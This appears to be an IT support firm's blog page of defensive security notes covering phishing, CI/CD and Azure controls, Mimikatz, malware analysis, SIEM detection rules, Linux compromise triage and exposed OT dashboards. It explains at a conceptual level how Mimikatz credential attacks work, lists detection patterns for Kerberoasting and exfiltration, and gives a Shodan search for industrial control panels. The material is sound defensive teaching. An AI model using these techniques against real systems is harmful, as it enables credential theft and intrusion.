Our Vision

To give customers the most compelling IT Support experience possible.

Our Mission

Our mission is simple: make technology an asset for your business not a problem.

Our Values

We strive to make technology integrate seamlessly with your business so your business can grow. As your technology partner, when your business grows ours will grow with you, therefore, we will work hand in hand with you to support your growth.

Our Values

We develop relationship that makes a positive difference in our customers Business.

Our Values

We exibit a strong will to win in the marketplace and in every aspect of our Business

Social Engineering Red flags and Email investigation

 

Social Engineering -

 A single individual or groups of people attempting to gain access to your systems by utilizing the following methods.

 

Relies on interaction with humans, tricked into handing over credentials - humans are the weakest link therefore they try Deceptive techniques into breaking in.

 


 

 Type of Social engineering Attacks :

  • Phishing - malicious email - sends a link
  • Spear-phishing - targets individuals or specific groups
  • Email spoofing - masquerading as someone else - appear as someone you think you know.
  • Baiting - entice victim to do something, leave a usb lying around.
  • Tailgating - gain access by following an employee through a door/gate.


Indicator or Red Flags to look for investigation:

 


 


Email Sphere phishing: In this email fraud the perpetrator will ask for confidential and sensitive information. This type of attack resembles with e-mail spoofing fraud but in here in almost all cases the sender is someone trustworthy with an authoritative position in the organization.

 

Business email compromise is when criminals use email to abuse trust in business processes to scam organizations out of money or goods.

 

The Email forensic investigator can use several header fields to trace the email but it can be broadly categorized into the following area of interest the investigator should look into:

Sender's SMTP Server (OUTGOING Mail Server) >>

 Encrypted mail header >> 

Typical To, From, Subject, and Date Lines >> 

Mail transfer email client information >>

Various X-header information added by different SMTP server and email clients during the whole email sending process.

 

CI/CD Pipelines and Automation

Modern web applications are built using modern continuous integration and deployment processes. 


This means that you run tests specific to whatever environment you are pushing to whether that's DEV, STAGING or PROD.



Control     Name          Priority          
3.1     CI/CD Pipeline     1    

Description: Implement a CI/CD pipeline  

Difficulty:      Medium     


Control     Name                           Priority     
3.2     Application Environments      2     

Description: Create separate environments for dev, staging and prod, and treat each as independent with its own data, testing and requirements     

Difficulty:    Medium   

Control     Name                               Priority            
3.3     Application Data Separation      3     

Description: Make sure that dev and test environments are not using the same data as production. If the use of live data is required then make sure that data is anonymized. 

Difficulty:   Difficult     

Control     Name                       Priority         
3.4     CI/CD Administration     3    

Description: Create and enforce user or team roles so that only the appropriate people can change or disable tests and deployment requirements

Difficulty:  Medium  

Control     Name             Priority           
3.5     Credential Store     1     

Description: Create a secure encrypted place to store senstive credentials like passwords, API keys, etc.   

 Difficulty: Medium    

Control     Name                                                       Priority           
3.6     Centralized Software Composition Analysis     1 

Description:  Scan source code for vulnerable libraries and open source software from within a CD stage   

Difficulty: Easy   

Control     Name                                     Priority  
3.7     Centralized Static Code Analysis     2    

Description: Scan source code for vulnerabilities in the source code itself from within a CD stage     

Difficulty:  Easy  

Control     Name                                     Priority    
3.8     Centralized Sensitive Data Analysis     2    

Description: Scan source code for secrets, credentials, API keys and similar from within a CD stage    

Difficulty: Easy     

Control     Name                                                                  Priority
3.9    
Dynamic Application Security Testing -DAST             3                        

Description:Scan running application for vulnerabilities

Azure Well Architected Security Review Checklist

 Here We have compiled for you a checklist for Azure Security.


Priority: High Weight: 90

Item No 1: Classify your data at rest and use encryption
Item No 2: Implement Conditional Access Policies

Priority: High Weight: 70
Item No 3: Conduct periodic access reviews for the workload
Item No 4: Use only secure hash algorithms (SHA-2 family)
Item No 5: Discover and remediate common risks to improve Secure Score in Azure Security Center
Item No 6: Define a set of Azure Policies which enforce organizational standards and are aligned with the governance team
Item No 7: Use tools like Azure Disk Encryption, BitLocker or DM-Crypt to encrypt virtual disks
Item No 8: Deprecate legacy network security controls
Item No 9: Integrate network logs into a Security Information and Event Management (SIEM)
Item No 10: Data in transit should be encrypted at all points to ensure data integrity
Item No 11: Establish a designated group responsible for central network management
Item No 12: Build a security containment strategy
Item No 13: Evolve security beyond network controls
Item No 14: Periodically perform external and/or internal workload security audits
Item No 15: Establish lifecycle management policy for critical accounts
Item No 16: Standardize on modern authentication protocols

Priority: Medium Weight: 60
Item No 17: Configure web apps to reuse authentication tokens securely and handle them like other credentials
Item No 18: Ensure security team has Security Reader or equivalent to support all cloud resources in their purview
Item No 19: Synchronize on-premises directory with Azure AD
Item No 20: Implement identity-based storage access controls
Item No 21: Design virtual networks for growth
Item No 22: Use standard and recommended encryption algorithms
Item No 23: Assign permissions based on management or resource groups
Item No 24: Add planning, testing, and validation rigor to the use of the root management group

Priority: Medium Weight: 50

Item No 25: Use managed identity providers to authenticate to this workload
Item No 26: Enforce password-less or Multi-factor Authentication (MFA)
Item No 27: Continuously assess and monitor compliance
Item No 28: Use identity services instead of cryptographic keys when available
Item No 29: Establish a designated point of contact to receive Azure incident notifications from Microsoft
Item No 30: Establish process and tools to manage privileged access with just-in-time capabilities
Item No 31: Implement role-based access control for application infrastructure

Priority: Medium Weight: 40
Item No 32: Implement resource locks to protect critical infrastructure.


 

Mimikaz


What is Mimikatz?

If you’re into penetration testing and windows red teaming then you might have probably heard of mimikatz, but in case you’re wondering or have heard of the tool but don’t know what it does, let’s see what is mimikatz.

Written in C-language, Mimikatz is a very powerful post-exploitation tool and as described by CrowdStrike CTO and Co-Founder, “The AK-47 of Cyber Attacks.” 

Some even claim mimikatz to be a Swiss Army Knife of Windows Credentials. Benjamin Delpy, who is the developer of this tool, claims that he created this tool to play with Windows Security. He maintains his own GitHub repository where he has provided the source code for the tool and updates it on a regular basis.

What can be done using Mimikatz?

Although known widely for credential dumping, this is not the only thing that it can do. 

Mimikatz is also capable of assisting in lateral movements and privilege escalations. Attacks like Pass-the-Hash, Pass-the-Ticket, Over-Pass-the-Hash, Kerberoasting etc. can also be achieved with Mimikatz.

Mimikatz Attack Capabilities

Mimikatz has numerous modules that let attackers perform a variety of tasks on the target endpoint. Some of the more important attacks facilitated by the platform are:

  • Pass-the-Hash—obtains an NTLM hash used by Windows to deliver passwords. This allows attackers to reuse the password without having to crack the hash.

  • Pass-the-Ticket—Mimikatz was famously used to break the Kerberos protocol. It can obtain a Kerberos “ticket” for a user account and use it to login as that user on another computer.

  • Kerberos Golden Ticket—obtains the ticket for the hidden root account (KRBTGT) that encrypts all authentication tickets, granting domain admin access for any computer on the network.

  • Kerberos Silver Ticket—exploits Windows functionality that grants a user a ticket to access multiple services on the network (via the Ticket Granting Server or TGS). The Kerberos protocol may not check the TGS key, allowing attackers to reuse the key and impersonate the user on the network.

  • Pass the Key—obtains a unique key used by a user to authenticate to a domain controller. The attacker can reuse this key to impersonate the user.

Anatomy of a Mimikatz Attack:

Mimikatz abuses and exploits the Single Sign-On functionality of Windows Authentication that allows the user to authenticate himself only once in order to use various Windows services. 

After a user logs into Windows, a set of credentials is generated and stored in the Local Security Authority Subsystem Service (LSASS) in the memory. As the LSASS is loaded in memory, when invoked mimikatz loads its dynamic link library (dll) into the library from where it can extract the credential hashes and dumps them onto the attacking system, and might even give us cleartext passwords.






Malware analysis, Tools and technique

 
                      
What is Malware Analysis?
Malware analysis is a process analyzing the samples of malware family such as Trojan, virus, rootkits, ransomware, spyware in an isolated environment to understanding the infection, type, purpose, functionality by applying the various methods based on its behavior to understanding the motivation and applying the appropriate mitigation by creating rules and signature to prevent the users.
 
Malware analysis plays an essential role in avoiding and understanding cyber attacks. When incident response teams are brought into an an incident involving malware, the team will typically gather and analyze one or more samples in order to better understand the attacker’s capabilities and to help guide their investigation.
 
Type of Malwares:

Type

What It Does

Real-World Example

Ransomware

disables victim's access to data until ransom is paid

RYUK

Fileless Malware

makes changes to files that are native to the OS

Astaroth

Spyware

collects user activity data without their knowledge

DarkHotel

Adware

serves unwanted advertisements

Fireball

Trojans

disguises itself as desirable code

Emotet

Worms

spreads through a network by replicating itself

Stuxnet

Rootkits

gives hackers remote control of a victim's device

Zacinlo

Keyloggers

monitors users' keystrokes

Olympic Vision

Bots

launches a broad flood of attacks

Echobot

Mobile Malware

infects mobile devices

Triada

 
How to perform Malware Analysis 
There are various types of analysis and related malware analysis tools that mainly used to break down the malware.
  • Static Malware Analysis
  • Dynamic Malware Analysis
  • Memory Forensics
  • Web Domain Analysis
  • Network interactions Analysis etc
Static Malware Analysis?
This procedure includes extraction and examination of different binary components and static behavioral inductions of an executable, for example, API headers, Referred DLLs, PE areas and all the more such assets without executing the samples.
Any deviation from the normal outcomes are recorded in the static investigation comes about and the decision given likewise. Static analysis is done without executing the malware whereas dynamic analysis was carried by executing the malware in a controlled environment.
 
1.Disassembly – Programs can be ported to new computer platforms, by compiling the source code in a different environment.
 
2.File Fingerprinting – network data loss prevention solutions for identifying and tracking data across a network
 
3.Virus Scanning -Virus scanning tools and instructions for malware & virus removal. Remove malware, viruses, spyware and other threats. ex: VirusTotal, Payload Security
 
4.Analyzing memory artifacts – During the time spent breaking down memory ancient rarities like[RAM dump, pagefile.sys, hiberfile.sys] the inspector can begin Identification of Rogue Process
 
5.Packer Detection – Packer Detection used to Detect packers, cryptors, Compilers, Packers Scrambler, Joiners, Installers.+ New Symbols+.
Static Malware analysis Tools
Ghidra and IDA : IDA Pro has been the go to SRE (Software Reverse Engineering) Suite for many years until Ghidra’s release in 2019. Since then Ghidra’s popularity has grown exponentially due to it being a free open-source tool that was developed and is still maintained by the NSA
 
Websites like : Hybrid-analysis, Virustotal.com
 
Other tools : Md5deep, PEiD, Exeinfo PE, RDG Packer,D4dot,PEview, WinDbg,Hxd
What is Dynamic Malware Analysis?
The dynamic analysis should always be an analyst’s first approach to discovering malware functionality. in dynamic analysis, will be building a virtual machine that will be used as a place to do malware analysis.
 
In addition, malware will be analyzed using malware sandbox and monitoring process of malware and analysis packets data made by malware.
Dynamic analysis tools: 
Some common Dynamic analysis are Wireshark, Netcat, Procmon, Process Explorer, Process Monitor,Regshot, ApateDNS Procmon, Procdot, Regshot, , Process Hacker, PeStudio, Fiddler, Wireshark, Cuckoo Sand box, Ghidra.
After you have gather some data its time for analysis:

  • Upload hash data/or file to site such virus total /anyrun / hybrid analysis to get info
  • If IP or domain name available, check DB of known Adversaries.
  • Use packet capture and traffic analysis, if external connection suspected by malware
  • Obtain the malicious file analyze in sandbox to identify indicators.
  • Use 'log s from SIEM and EDR to identify other infected endpoint.
  • Take the identified endpoint of the network, do not power off
  • Use data gathered to setup blocks for future attacks.

SIEM Rules from Event log ID and use cases


 Below are some guidance on rule creation and what event to look for:
Collection - Domain Controller - User Activity - Network Share Accessed
This rule looks for Windows Event ID 5140 which indicates that a network share has been accessed. When on Workstations or Domain controllers, this event can be used to identify access to C$ or Admin$. Common false positives will be IPC$, \Sysvol, \Netlogon.
 
Credential Access - AD - Account Lockout - Service Account
Event ID 4740
 
Defense Evasion - Domain Controller - System Change - Event Logs Cleared
Identifies the deletion of event logs from a windows host or domain controller. This may be performed to destroy evidence of malicious activity on a system.
Event ID 1102
 
Discovery - AD - Account Enumeration - Host
Event ID 4771, 4625,4768
 
Discovery - AD - Kerberoasting
This rule looks for activity on Active Directory indicative of Kerberoasting attacks. Kerberoasting is where an attacker cracks a Kerberos service ticket and rewrites them in order to gain access to a targeted service.
Event ID 4769
 
Execution - Network - Access Attempt - Unicode Domain
Identifies web requests where the website domain contains Unicode characters. Unicode allows the display of foreign characters within the URL bar and can be used to attempt to trick users to go to malicious websites.
URL is : *?xn--.*? Log source : web proxy Server and Firewalls
 
Exfiltration - Email - Auto Forwarding
This rule looks for many emails from a single internal user going to an external email address, indicative of a user forwarding their external mail content to a personal mailbox.
Vendor Msg id is : send , and status is: originating
 
Initial Access - ADFS - Excessive Login Failures
Identifies a large volume of ADFS failures, which may indicate account enumeration, brute-force login activity or a client misconfiguration.
Event ID 1201,1203,1205
 
Initial Access - Remote Access - Login Attempt - Different Geos
Identifies VPN login attempts by the same user across geographically distant locations in a short time period. This may indicate account compromise, especially if the user is not traveling.

 
Lateral Movement - Domain Controller - Login Attempt - Interactive
Identifies a remote interactive login to a domain controller.
Event ID 4624 and Session type is 10,2
 
Persistence - Domain Controller - System Change - Audit Policy Changed
Identifies system audit policy changes on windows hosts. This represents a change to the type of security events logged by the system and may be a pre-attack activity to avoid detection.
Event ID 4719,4905,4912
 
Persistence - Domain Controller - System Change - Domain Policy Changed
Event ID 4739
 
Persistence - Domain Controller - System Change - Multiple Processes Created
Identifies a large number of processes being created in a short time on a monitored windows host. The presence of an abnormal volume of abnormal processes may indicate the host has been compromised or is being misused.
Event ID 4688  Unique value>=10
 
Persistence - Domain Controller - System Change - Scheduled Task
Identifies the creation of new scheduled tasks as well as changes to existing tasks. The creation of new scheduled tasks or the removal of existing ones may be technique to maintain persistence.
Event ID:4698,4699,4700,4701,4702
 
Persistence - Domain Controller - System Change - Service Installed
Identifies the installation of unexpected services on a system. The installation of unexpected services may be an indicator of system compromise or misuse.
Event ID: 7045,4697,601
 
Privilege Escalation - AD - Group Change - Admin
Identifies attempts to change a user's group membership in AD. The high risk associated with delegating certain permissions in AD warrants a high level of scrutiny. For example, the promotion of a domain user to domain admin.
Event ID: 4728,4732,4746,4751,4756,4761
 
Privilege Escalation - ATP - Golden Ticket
This rule looks for Golden Ticket related activity identified by Azure ATP. See here for more details: https://docs.microsoft.com/en-us/azure-advanced-threat-protection/suspicious-activity-guide?tabs=external.
Event ID 2009,2013,2027,2032,2022
 
Hunting the Fileless Malware & Powershell Activities:
Event IDs (4104, 4103, and 4688)
 
  • Event ID 4103 – Module logging – Attackers uses several obfuscated commands and calls self-defined variables and system commands , Hunting these Event ID provides soc operations to record all the obfuscated commands as pipeline execution details under the event ID 4103.It should be enabled to process and get the malicious commands.
  • Event ID 4104 – Powershell Script Block Logging – Captures the entire scripts that are executed by remote machines. For Example Obfuscated scripts that are decoded and executed at the run time.This gives additional visibility on remote command.
  • If an event exceeds the maximum event log message size, script block logging will split the logged events into multiple events and Suspicious commands can be observed at the logging level of “warning”.
 
USE CASE: DNS QUERY Objective: The mission of this hunt is to drill down DNS logs to baseline common domains queried by endpoints in the environment as well as identify potentially infected endpoints by looking for possible DNS tunneling, domain generation algorithm (DGA) domains, and traffic to risky top-level domains (TLDs).
Log Source & Requirements: DNS query logging
Duration: 30 Days

Linux Compromises & Access Tools and Where to Find Them

 Linux compromises 


  • Linux systems are 'occasionally' targeted by actors, especially cryptomining and ransomware crews.
  • This process can be similar to Windows machine compromises but some areas are specific to each flavour
  • The below are a brief overview of the exploitation, protection, detection and remediation processes of Linux operating systems.

Exploitation:
    • Same process as windows devices:
    • Exploit external facing service
    • Establish persistence
    • Collect credentials
    • Move laterally
Protection:
    • Similar to Windows:
    • Patch
    • Including applications
    • Cron job with apt / yum update
    • Limit number of admins with sudo powers
    • Application whitelisting (fapolicyd)
    • ACSC also have a Linux hardening worksheet which could be useful (Hardening Linux Workstations and Servers)


Detection:
    • Utilising Logs
    • Weblogs
    • Exploitation attempts
    • Webshells
    • Commandline logging
    • SSH logs
    • Memory images (which I don’t think is a viable way for continuous detection, for incident response more likely)
    • Use Yara rules to search for malware; Volatility plugin

 

Process data:

    • ps -eaf
    • pstree

 

Get service (cron) data:

    • ls -la /etc/cron*
    • Cron jobs redirecting to "> /dev/null" are worth checking out
Remediation:
    • Change passwords
    • Regenerate keys (e.g. In ssh)
    • Remove added users
    • Clean off malware (webshells, scripts, implants)
    • Remove cron jobs
    • Monitor for reconnection attempts (from known malicious IPs)

 

Fantastic Access Tools
    •   Attackers are increasingly using remote access tools to gain and maintain access to the network, through the utilisation of either:
    • Tools already deployed (and obtaining creds)
    • Deploying own software

Generic detection to help find these tools in your org
    • Event 4688 - process names
    • Event 4697 - service creation event (if tool was installed as a service)
    • Sysmon - process names, DNS lookups / network traffic to known RMT domains
    • Firewall logs - connections classified as app
    • Can also manually check with a host using:
    • Wmic /node:<target> process list

 

Tool brief overviews
  • Recent report: Anomali, ‘ScreenConnect Remote Access Tool Utilizing Ministry of Foreign Affairs-Themed EXEs and URLs’
    • DameWare
    • Requires incoming connection from the internet on various ports
    • Connects to IPv6 local host
    • Shodan.io - product:dameware
    • Dwrcs.exe
    • GoToAssist
    • Generates outgoing HTTP/S traffic - look for logmein or gotoassist
    • Gotoassist.exe
    • ConnectWiseControl / ScreenConnect
    • Generates outgoing HTTP/S traffic
    • Screenconnect.clientservice.exe
    • Commonly used for phishing emails with a URL that deploys ScreenConnect directly
Guidance:
    • Keep an eye out for any remote management/access tools
    • Most of them will probably be "legit". If they are, ensure they:
    • Use MFA
    • Turn on logging
    • Manage the users
    • Turn off processes when not in use

------------------------------------------------------------------------------------------
SDBBot
  • SDBBot is a remote access trojan identified by Proofpoint in 2019. The ACSC issued an alert in November last year about increased sightings in attacks targeting healthcare. It's often used to drop ransomware.
  • Initial infection is usually via ISO or Excel email attachments. It sends C&C traffic over port 443 in a plaintext protocol. 


Prevention:
    • Microsoft's Attack Surface Reduction rules
    • Block ISO attachments and downloads 
    • Block non-HTTPS traffic over port 443


'Lo-Tech OT hacking'
  • A general primer on finding and securing 'human-machine interfaces', or HMIs - i.e. dashboards for SCADA/OT equipment.
  • Common exposed HMIs include HVACs, fridges, etc. 
  • Cool Shodan search: https://www.shodan.io/search?query=screenshot.label%3Aics
  • HMIs are easy to find and access. Targeted industrial sabotage is unlikely; most hackers are bored and poking at low-hanging fruit. 
  • This maps with OTORIO's report about the Israeli reservoir 'hack' in December. They concluded that the attackers likely 'did not possess any deep industrial capabilities or knowledge' and targeted the system solely because it was unprotected. 
  • Note:  we calle attacks on these devices 'annoying' but 'unlikely to be dangerous'. An attendee pointed out that a hacked fridge could be catastrophic for a hospital or pharmacy storing temperature-controlled medications.

  • Recommendation is network scanning and searching Shodan for modbus and dnp3, plus other common HMI ports and protocols. 
 
Teamviewer and remote access security
  • In light of the Florida water incident, they added some points about securing remote access/support tools. Nothing too exciting, just 'figure out what tools are in use at your organization' and 'maybe try to secure them?' 
  • Apparently there will be a more detailed brief on this incident later.

Twitter Facebook Favorites More